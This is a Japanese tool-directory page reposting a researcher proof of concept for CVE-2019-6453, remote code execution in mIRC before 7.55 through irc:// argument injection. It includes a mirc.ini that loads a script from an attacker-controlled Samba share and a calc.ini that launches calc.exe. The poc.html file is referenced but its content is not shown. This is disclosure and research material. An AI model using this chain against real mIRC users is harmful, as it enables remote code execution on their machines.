Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2019-6453-poc — CVE-2019-6453 の計算実証 | Kitploit
ツール/GitHubGitHub/proofofcalc/cve-2019-6453-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubproofofcalc/cve-2019-6453-poc

cve-2019-6453-poc

CVE-2019-6453 の計算実証

リポジトリを見る
48122年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-6453: カスタムURIプロトコルハンドラを通じた引数インジェクションによる mIRC <7.55 のRCE

私たちは、irc:// URIプロトコルハンドラを通じて mIRC にリモートコード実行の脆弱性を発見しました。mIRC は引数リストの終わりを示す -- のようなシジル(区切り記号)を使用していないため、攻撃者は irc:// リンクを介して mIRC に引数を渡し、攻撃者が制御する Samba ファイルサーバーからカスタムの mirc.ini を読み込むことで任意のコードを実行できます。ircs:// も同様に動作することに注意してください。

PoC

この実証コード(PoC)には、mirc.ini、calc.ini、poc.html の3つのファイルが必要です。攻撃者側で Samba ファイルサーバーが動作していることを前提とします。この例では、以下のコードはホスト 127.0.0.1 で動作していることを前提としています(つまり、実際に試す場合は、以下のファイル内の 127.0.0.1 をご自身のサーバーのアドレスに置き換えてください)。

mirc.ini

mirc.ini はカスタム構成ファイルで、ファイルサーバー上の C:\mirc-poc\mirc.ini に配置する必要があります。

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini はリモートスクリプトファイルで、ファイルサーバー上の C:\mirc-poc\calc.ini に配置する必要があります。

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

mIRC が irc:// URI スキームの既定のハンドラとして設定されており、ブラウザがペイロードをエンコードしない場合、poc.html にアクセスするだけで動作するはずです。ブラウザや設定によっては、プロンプトが表示される可能性があります(Firefox では表示されません)。

root@kitploit:~

PoC gif

PoC GIF

Affected versions

このPoCは mIRC <7.55 で動作します。

Edge 42.17134(最終プレビュー版)および Firefox 64.0.2(最終リリース版)でPoCを実行できます。 Chrome では動作しません。Chrome が URI プロトコルを処理する方法(URI がアプリケーションに渡される前にエンコードされる)によるものです。

Authors

  • Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
ツールをダウンロード